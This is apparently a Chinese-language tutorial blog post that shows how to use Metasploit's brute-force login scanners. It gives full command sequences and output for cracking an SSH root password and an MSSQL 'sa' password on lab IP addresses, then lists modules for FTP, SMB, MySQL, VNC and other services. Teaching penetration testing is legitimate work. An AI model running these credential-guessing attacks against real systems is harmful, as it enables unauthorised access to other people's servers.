暴力破解工具metasploit模块使用
文章仅供学习。用于其他用途而产生不良后果,作者不承担任何法律责任!
┌──(root💀kali)-[~/桌面]
└─# msfconsole
=[ metasploit v6.0.15-dev ]
+ -- --=[ 2071 exploits - 1123 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more
msf6 >
现在已经是进入到metasploit中了 这篇主要说暴力破解模块
use 使用模块
set 设置
show options 查询设置
back 返回
info 查询模块的信息
exploit/run 运行模块
ssh示例
msf6 > use auxiliary/scanner/ssh/ssh_login #使用模块
msf6 auxiliary(scanner/ssh/ssh_login) > info #查询模块的信息
Name: SSH Login Check Scanner
Module: auxiliary/scanner/ssh/ssh_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
todb <todb@metasploit.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
Description:
This module will test ssh logins on a range of machines and report
successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins
and hosts so you can track your access.
References:
https://cvedetails.com/cve/CVE-1999-0502/
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.21.141
RHOSTS => 192.168.21.141 #指定目标IP
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME root
USERNAME => root #指定目标用户
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/passwd.txt #指定密码字典
PASS_FILE => /root/passwd.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true #得出正确密码后停止
msf6 auxiliary(scanner/ssh/ssh_login) > set THREADS 16 #设置线程
THREADS => 16
msf6 auxiliary(scanner/ssh/ssh_login) > run #开始执行 或者exploit 命令
[+] 192.168.21.141:22 - Success: 'root:111111' 'uid=0(root) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 3.10.0-957.el7.x86_64 #1 SMP Thu Nov 8 23:39:32 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.21.147:44141 -> 192.168.21.141:22) at 2021-11-30 20:51:21 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) >
用户名为root 密码为111111
mssql示例
msf6 auxiliary(scanner/ssh/ssh_login) > back
msf6 > use auxiliary/scanner/mssql/mssql_login #使用mssql模块
msf6 auxiliary(scanner/mssql/mssql_login) > show options #查看配置信息
Module options (auxiliary/scanner/mssql/mssql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME sa no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/mssql/mssql_login) > set DB_ALL_USERS true
DB_ALL_USERS => true #设置用户
msf6 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /root/passwd.txt #设置密码字典
PASS_FILE => /root/passwd.txt
msf6 auxiliary(scanner/mssql/mssql_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true #得到正确密码后自动停止
msf6 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 192.168.21.162 # 指定目标IP
RHOSTS => 192.168.21.162
msf6 auxiliary(scanner/mssql/mssql_login) > exploit #开始执行
[*] 192.168.21.162:1433 - 192.168.21.162:1433 - MSSQL - Starting authentication scanner.
[-] 192.168.21.162:1433 - 192.168.21.162:1433 - LOGIN FAILED: WORKSTATION\sa:sanhe000~!@# (Incorrect: )
[+] 192.168.21.162:1433 - 192.168.21.162:1433 - Login Successful: WORKSTATION\sa:123456
[*] 192.168.21.162:1433 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mssql/mssql_login) >
用户名为sa 密码为123456
ftp
msf6 > auxiliary/scanner/ftp/ftp_login
telnet
msf6 > auxiliary/scanner/telnet/telnet_login
smb
msf6 > auxiliary/scanner/smb/smb_login
MySQL
msf6 > auxiliary/scanner/mysql/mysql_login
Oracle
msf6 > auxiliary/scanner/oracle/oracle_login
postgres
msf6 > auxiliary/scanner/postgres/postgres_login
vnc
msf6 > auxiliary/scanner/vnc/vnc_login
pcanywhere
msf6 > auxiliary/scanner/pcanywhere/pcanywhere_login
snmp
msf6 > auxiliary/scanner/snmp/snmp_login